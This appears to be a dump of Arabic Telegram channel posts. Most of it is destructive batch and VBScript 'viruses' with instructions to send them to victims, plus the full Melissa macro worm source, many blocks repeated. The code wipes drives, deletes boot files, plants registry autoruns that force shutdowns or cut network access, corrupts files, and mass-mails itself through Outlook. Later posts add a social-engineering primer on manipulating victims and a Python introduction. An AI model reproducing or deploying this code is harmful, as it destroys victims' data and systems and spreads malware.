Forwarded from نيران الصيف
بما انه طلع عندنا قناة ح انشر ليكم الزيتون
(انشاء سيرفر مجاني ، تعليم الحقن اليدوي)
بالسيرفر ح تستغنى عن نجروك ومشاكلها (هوست وبورت ثابتين طول الشهر ومجاني)
الحقن اليدوي (لتطبيقات الآيفون والويندوز والاندرويد )
الشروحات دي م حتلقوها في مكان غير قناتنا zoalktoom
اشترك وفعل الاشعارات اول من القناة تحصل عدد مشتركين محترم ح انزل ليكم الشروحات
https://www.youtube.com/channel/UCd5J9qDpk-MtmZVYcVT4S4Q
(انشاء سيرفر مجاني ، تعليم الحقن اليدوي)
بالسيرفر ح تستغنى عن نجروك ومشاكلها (هوست وبورت ثابتين طول الشهر ومجاني)
الحقن اليدوي (لتطبيقات الآيفون والويندوز والاندرويد )
الشروحات دي م حتلقوها في مكان غير قناتنا zoalktoom
اشترك وفعل الاشعارات اول من القناة تحصل عدد مشتركين محترم ح انزل ليكم الشروحات
https://www.youtube.com/channel/UCd5J9qDpk-MtmZVYcVT4S4Q
YouTube
The band Blue
يسعدني ويشرفني انضمامك في قناة The band Blue وانا ممتن انك وصلت الي هنا هذا يعني انك تريد التعرف على قناتي The band Blue اكثر وعلي انا شخصيا ..
اولا اسمي : سعيد احمد من السودان اهتم بكل ماهو مفيد!
هدفي الرئيسي هو تقديم المعلومات مهما كان نوعها، كذلك انا…
اولا اسمي : سعيد احمد من السودان اهتم بكل ماهو مفيد!
هدفي الرئيسي هو تقديم المعلومات مهما كان نوعها، كذلك انا…
فيروس يقوم بخلط بين الامتدادات :
@echo off
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
افتح نوتباد واكتب هذا واحفظه بصيغه بات وارسله للضحيه 😁👍
@echo off
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
افتح نوتباد واكتب هذا واحفظه بصيغه بات وارسله للضحيه 😁👍
كود فيروس ميليسيا المدمر كمان ارسله للضحيه وانسى انه كان عندك ضحيه :
Private Sub AutoOpen() On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\o rd\e curity", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\o rd\e curity", "Level") = 1&
Else p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. Im outta here."
Private Sub AutoOpen() On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\o rd\e curity", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\o rd\e curity", "Level") = 1&
Else p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. Im outta here."
الفيروس 11:
هذا الفيروس رح يضغط انتر دايما وابدا بشكل جنوني
انسخ الكود التالي:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
ws
cript.sleep 100
wshshell.sendkeys "~(enter)"
loop
احفظ الملف بامتداد VBS وارسلة الي الهدف
الفيروس 12 :
هذا الفيروس سيقوم بمسح كل محتويات الجهاز
قم بنسخ الكود التالي للمفكره :
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
احفظ الملف بامتداد bat
الفيروس 13 :
لا انصح بتجربته
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
احفظ الملف بامتداد vbs
الفيروس 14 :
لتدمير ويندوز اكس بي
انسخ الكود التالي الي المفكرة:
@Echo off
Del C: *.* |y
احفظ الملف بامتداد bat
الفيروس 15 :
لتعطيل الويندوذ
انسخ الكود الي المفكرة:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * اليمن حره !!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
احفظ الملف بامتداد bat هذا الفيروس رح يعرض رسالة في جهاز الضحية "اليمن حره" ويغلق جهاز الكمبيوتر ولن يتمكن من اعادة تشغيلة مرة أخري
الفيروس 16:
اغلاق الكمبيوتر في كل مره يتم تشغيلة
انسخ الكود التالي للمفكرة واحفظه بامتداد bat
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
الفيروس 17 :
منع اي جهاز من الوصول الي الانترنت
انسخ الكود التالي للمفكرة واحفظه بامتداد bat
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
الفيروس 18 :
فيروس لتحويل كل الملفات بداخل الكمبيوتر الي ملفات نصيه معطوبه
انسخ الكود التالي للمفكرة واحفظه بامتداد bat
REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
الفيروس 19 :
فيروس لتعطيل الويندوز
انسخ الكود التالي للمفكرة واحفظه بامتداد bat
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE
الفيروس 20:
ايقاف الكمبيوتر في كل مره تقوم بتشغيله
انسخ الكود التالي للمفكرة واحفظه بامتداد bat
@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit
انسخ الملف وقم بوضعة في فولدر الاستارتاب Startup folder
في كل مره يتم فيها تشغيل الكمبيوتر رح يقوم الفيروس باللغاء التشغيل
هذا الفيروس رح يضغط انتر دايما وابدا بشكل جنوني
انسخ الكود التالي:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
ws
cript.sleep 100
wshshell.sendkeys "~(enter)"
loop
احفظ الملف بامتداد VBS وارسلة الي الهدف
الفيروس 12 :
هذا الفيروس سيقوم بمسح كل محتويات الجهاز
قم بنسخ الكود التالي للمفكره :
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
احفظ الملف بامتداد bat
الفيروس 13 :
لا انصح بتجربته
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
احفظ الملف بامتداد vbs
الفيروس 14 :
لتدمير ويندوز اكس بي
انسخ الكود التالي الي المفكرة:
@Echo off
Del C: *.* |y
احفظ الملف بامتداد bat
الفيروس 15 :
لتعطيل الويندوذ
انسخ الكود الي المفكرة:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * اليمن حره !!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
احفظ الملف بامتداد bat هذا الفيروس رح يعرض رسالة في جهاز الضحية "اليمن حره" ويغلق جهاز الكمبيوتر ولن يتمكن من اعادة تشغيلة مرة أخري
الفيروس 16:
اغلاق الكمبيوتر في كل مره يتم تشغيلة
انسخ الكود التالي للمفكرة واحفظه بامتداد bat
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
الفيروس 17 :
منع اي جهاز من الوصول الي الانترنت
انسخ الكود التالي للمفكرة واحفظه بامتداد bat
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
الفيروس 18 :
فيروس لتحويل كل الملفات بداخل الكمبيوتر الي ملفات نصيه معطوبه
انسخ الكود التالي للمفكرة واحفظه بامتداد bat
REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
الفيروس 19 :
فيروس لتعطيل الويندوز
انسخ الكود التالي للمفكرة واحفظه بامتداد bat
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE
الفيروس 20:
ايقاف الكمبيوتر في كل مره تقوم بتشغيله
انسخ الكود التالي للمفكرة واحفظه بامتداد bat
@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit
انسخ الملف وقم بوضعة في فولدر الاستارتاب Startup folder
في كل مره يتم فيها تشغيل الكمبيوتر رح يقوم الفيروس باللغاء التشغيل
فيروس يفتح cmd.exe ملايين المرات حتى يعلق الكمبيوتر ويتم اطفائه😁❤️
انسخ الكود التالي للمفكره: .
@echo off
:top
start
goto top
احفظ الملف بامتداد bat مثلا FileName.bat
انسخ الكود التالي للمفكره: .
@echo off
:top
start
goto top
احفظ الملف بامتداد bat مثلا FileName.bat
How to make a simple Worm?
@echo off
:loop
md worm
copy worm.bat worm\
cd worm
goto loop
افتح نوت باد الصقه😁❤️ واحفظه بصيغه .bat وارسله للضحيه😁❤️
@echo off
:loop
md worm
copy worm.bat worm\
cd worm
goto loop
افتح نوت باد الصقه😁❤️ واحفظه بصيغه .bat وارسله للضحيه😁❤️
بعض الايام وسارسل لكم فايروس worm قديم 😁❤️ من صنع صديقي يعمل على انظمه win ب32 بت اقصد بنواة النظام وداعا😁❤️ يكفي اليوم هذه الفيروسات
https://youtu.be/SRls4cYhhCs
فديو يشرح كيفيه اختراق ويندوز 10 عن طريف فديو mp4 وهي عباره عن ثغره في برنامج vlc
اي احد يريد ان يسالني هذه معرفي😁❤️ يرسل وساجيبه غدا DEV_LLX24@
فديو يشرح كيفيه اختراق ويندوز 10 عن طريف فديو mp4 وهي عباره عن ثغره في برنامج vlc
اي احد يريد ان يسالني هذه معرفي😁❤️ يرسل وساجيبه غدا DEV_LLX24@
YouTube
Exploits Windows 10 - VLC Media Player Vulnerability | 2019
VLC Media Player | Exploits Windows 10 (VLC vulnerability) | VideoLAN VLC | CVE-2018-11529 | VLC Media Player Vulnerability | VideoLAN VLC media player | 2019
** This video is educational purpose !!!
The VLC media player is an open source cross-platform…
** This video is educational purpose !!!
The VLC media player is an open source cross-platform…
Forwarded from أخبار تقنية
سوف ارسل شرح لثغرات ال sop
وال core😁❤️ ثغرات تخص المهتمين في مجال bug bounty
افضل شرح عربي لها هو شرح @x1337r00t
https://3alam.pro/1337r00t/articles/cors-sop
وتأكد من console log اذا واجهتك رسالة خطأ SOP
الشرح مقدم من صديقي من فريق black fox❤️😁بلتوفيق
وال core😁❤️ ثغرات تخص المهتمين في مجال bug bounty
افضل شرح عربي لها هو شرح @x1337r00t
https://3alam.pro/1337r00t/articles/cors-sop
وتأكد من console log اذا واجهتك رسالة خطأ SOP
الشرح مقدم من صديقي من فريق black fox❤️😁بلتوفيق
عالم البرمجة
شرح حماية SOP و CORS والثغرات اللتي تحدث بسببها وطرق الحماية | عالم البرمجة
الSOP/CORS هم حصانة المعلومات الحساسة من هجمات CORS vulnerability !
Forwarded from BLACK SHADOW (°SaYa°)
#pyton
السلام عليكم ورحمة الله وبركاته
كيف حالكم جميعاً أتمنى أشوفكم بخير يارب
اليوم سوف نبدأ في تعلم لغة بايثون على هذه القناة
وأتمنى شرحي يكون سهل عليكم في تعلم بايثون رغم لايوجد صعوبه في لغة بايثون الى أن في بعض الناس تجد تعلم بايثون شيء صعب ومستحيل ولايوجد شيء مستحيل في هذا الأمر وإن شاء الله تفهمون وترجعون الى الحفظ لكي تسهل معاكم تعلم بايثون
بــســم الله نبدأ في المقدمة
ماهي لغه بايثون ؟
هي لغة برمجة، من لغات المستوى العالي، تتميز ببساطة كتابتها وقراءتها، سهلة التعلم، تستخدم أسلوب البرمجة الكائنية، مفتوحة المصدر، وقابلة للتطوير. تعتبر لغة بايثون لغة تفسيرية، متعددة الأغراض وتستخدم بشكل واسع في العديد من المجالات، كبناء البرامج المستقلة باستخدام الواجهات الرسومية المعروفة وفي عمل برامج الويب، بالإضافة إلى استخدامها كلغة برمجة نصية للتحكم في أداء بعض من أشهر البرامج المعروفة أو في بناء برامج ملحقة لها. وبشكل عام يمكن استخدام بايثون لبرمجة البرامج البسيطة للمبتدئين، ولإنجاز المشاريع الضخمة كأي لغة برمجية أخرى في نفس الوقت. غالباً ما يُنصح المبتدؤون في ميدان البرمجة بتعلم هذه اللغة لأنها من بين أسرع اللغات البرمجية تعلماً.
نشأت بايثون في مركز CWI (مركز العلوم والحاسب الآلي) بأمستردام على يد جايدو ڤان روسم في أواخر الثمانينات من القرن المنصرم، وكان أول إعلان عنها في عام 1991. تم كتابة نواة اللغة بلغة سي. أطلق ڤان روسم الاسم "بايثون" على لغته تعبيرًا عن إعجابه بفِرقَة مسرحية هزلية شهيرة من بريطانيا، كانت تطلق على نفسها الاسم مونتي بايثون.
تتميز بايثون بمجتمعها النشط، كما أن لها الكثير من المكتبات البرمجية ذات الأغراض الخاصة والتي برمجها أشخاص من مجتمع هذه اللغة، مثلاً مكتبة باي جايم التي توفر مجموعة من الوظائف من أجل برمجة الألعاب. ويمكن لبايثون التعامل مع العديد من أنواع قواعد البيانات مثل ماي إس كيو إل وغيره.
وهذه بعض محررات بايثون للهاتف الذكي
https://play.google.com/store/apps/details?id=ru.iiec.pydroid3
https://play.google.com/store/apps/details?id=org.qpython.qpy3
أما أجهزة ابل ( الآيفون) فأنصحكم بـ
https://apps.apple.com/us/app/pythonista-3/id1085978097
أما للحواسيب فأنصحكم بإستخدام برامج مشهوره مثل :
PyCharm
أو إستخدام محرر بايثون عبر الويب
https://www.onlinegdb.com/
وحظ موفق للجميع..
#saya
#Black_shadow
السلام عليكم ورحمة الله وبركاته
كيف حالكم جميعاً أتمنى أشوفكم بخير يارب
اليوم سوف نبدأ في تعلم لغة بايثون على هذه القناة
وأتمنى شرحي يكون سهل عليكم في تعلم بايثون رغم لايوجد صعوبه في لغة بايثون الى أن في بعض الناس تجد تعلم بايثون شيء صعب ومستحيل ولايوجد شيء مستحيل في هذا الأمر وإن شاء الله تفهمون وترجعون الى الحفظ لكي تسهل معاكم تعلم بايثون
بــســم الله نبدأ في المقدمة
ماهي لغه بايثون ؟
هي لغة برمجة، من لغات المستوى العالي، تتميز ببساطة كتابتها وقراءتها، سهلة التعلم، تستخدم أسلوب البرمجة الكائنية، مفتوحة المصدر، وقابلة للتطوير. تعتبر لغة بايثون لغة تفسيرية، متعددة الأغراض وتستخدم بشكل واسع في العديد من المجالات، كبناء البرامج المستقلة باستخدام الواجهات الرسومية المعروفة وفي عمل برامج الويب، بالإضافة إلى استخدامها كلغة برمجة نصية للتحكم في أداء بعض من أشهر البرامج المعروفة أو في بناء برامج ملحقة لها. وبشكل عام يمكن استخدام بايثون لبرمجة البرامج البسيطة للمبتدئين، ولإنجاز المشاريع الضخمة كأي لغة برمجية أخرى في نفس الوقت. غالباً ما يُنصح المبتدؤون في ميدان البرمجة بتعلم هذه اللغة لأنها من بين أسرع اللغات البرمجية تعلماً.
نشأت بايثون في مركز CWI (مركز العلوم والحاسب الآلي) بأمستردام على يد جايدو ڤان روسم في أواخر الثمانينات من القرن المنصرم، وكان أول إعلان عنها في عام 1991. تم كتابة نواة اللغة بلغة سي. أطلق ڤان روسم الاسم "بايثون" على لغته تعبيرًا عن إعجابه بفِرقَة مسرحية هزلية شهيرة من بريطانيا، كانت تطلق على نفسها الاسم مونتي بايثون.
تتميز بايثون بمجتمعها النشط، كما أن لها الكثير من المكتبات البرمجية ذات الأغراض الخاصة والتي برمجها أشخاص من مجتمع هذه اللغة، مثلاً مكتبة باي جايم التي توفر مجموعة من الوظائف من أجل برمجة الألعاب. ويمكن لبايثون التعامل مع العديد من أنواع قواعد البيانات مثل ماي إس كيو إل وغيره.
وهذه بعض محررات بايثون للهاتف الذكي
https://play.google.com/store/apps/details?id=ru.iiec.pydroid3
https://play.google.com/store/apps/details?id=org.qpython.qpy3
أما أجهزة ابل ( الآيفون) فأنصحكم بـ
https://apps.apple.com/us/app/pythonista-3/id1085978097
أما للحواسيب فأنصحكم بإستخدام برامج مشهوره مثل :
PyCharm
أو إستخدام محرر بايثون عبر الويب
https://www.onlinegdb.com/
وحظ موفق للجميع..
#saya
#Black_shadow
Google Play
Pydroid 3 - IDE for Python 3 - Apps on Google Play
Learn Python 3 with the most powerful Python 3 interpreter & IDE on Google Play
Forwarded from Project Sigma - Programming (Khalil Abbas | ÃŕMąŃđÒ)
ملخص سريع وبسيط لأساسيات لغة البايثون وأهم أفكار ومواضيع اللغة مع الأمثلة
متابعة الشرح على القناة
@shadow_YE
متابعة الشرح على القناة
@shadow_YE
Forwarded from أخبار تقنية
Forwarded from أخبار تقنية
هل تسائلت يوما ما الذي يجب عليك فعله او الخطوات التي يجب عليك إتباعها في حالة وجدت ثغرة او Bug في منصة محددة ؟ يمكنك بالطبع إستغلالها لصالحك الشخصي، او يمكنك إتباع هذا المقال الذي يخبرك كيف تقوم بالتبليغ عنها لتحصل على عائد مادي ( كبير ) من خلالها 😁👇
https://link.aqweeb.com/38N4672
https://link.aqweeb.com/38N4672
الهندسة الإجتماعية : فن إختراق العقل !
لا تحتاج الى تعلم التكويد او البرمجة او لغة البايثون لتحترف او على الأقل لتفهم و تمارس الهندسة الإجتماعية، فالهندسة الإجتماعية تلعب على شطرين رئيسين : معرفة كم جيد من المعلومات حول الضحية التي تنوي إختراقها، ثم معرفة كيفية التلاعب بها و تنظيمها بطريقة غير مثيرة للريبة. الهندسة الإجتماعية ببساطة هي جعل أي شخص يقوم بأي شيئ تريده او يقوم بتوفير أي نوع من المعلومات التي تريدها دون الحاجة بإستخدام فقط بعض التقنيات التكنولوجية مثل الحاسوب او الإنترنت ثم تنظيم أفكارك و قراءة ردة فعل الضحية و التعامل معها بطريقة إحترافية الى حين كسب ثقته الكاملة و توفير كل المعلومات التي تحتاجه من معلومات او بيانات مثل معلومات الولوج لحسابات شخصية او غيرها من البيانات.تستخدم الهندسة الإجتماعية بشكل كبير رقميا، إذ يجلس خلف الشاشة شخص معين قد جهز نفسه جيدا من أجلك، و لا يمكننا ان نقول ان استخدامها ضعيف في العالم الحي، بل شائع كذلك، إذ يستطيع ممارس الهندسة الإجتماعية أخذ اي نوع من البيانات بطيب خاطر للضحية.
الأدوات المستخدمة في الهندسة الإجتماعية :
سأذكر هنا ان الأداة الأساسية في عملية الهندسة الإجتماعية بعد القدرات العقلية على التلاعب بالطبع هي أداة Maltego، وفرنا شرحا وافيا لأداة Maltego في أكثر من مناسبة، منها مقالنا حول أفضل ادوات إختراق للويندوز، او أقوى ادوات نظام Kali Linux، تسمح لك أداة Maltego بتجميع كل أنواع المعلومات و البيانات حول ضحية معينة، ثم تقوم بالربط بين كل هذه المعلومات من أجل إستخراج بيانات محددة، فمن خلال تجميع العديد من المعلومات حول الضحية، و إن اردت ممارسة الهندسة الإجتماعية توجب عليك فعل ذلك بالتأكيد، ثم تنظيم هذه المعلومات حسب نظام معين، حتى ان الأداة قد توفر لك بعض الإقتراحات مثلا لكلمات سر من خلال تلك المعلومات قد يستخدمها الضحية في احد حساباته، او إستخراج معطيات أخرى إنطلاقا من المعطيات الموجودة. من Maltego سننتقل مباشرة لأداة SE Toolkit الموجودة كذلك في العديد من أنظمة الإختراق المعروفة، تسمح لك أداة SE Toolkit بصناعة العديد من الصفحات و الأرقام و غيرها من الأدوات الوهمية، فمثلا تستطيع من خلالها 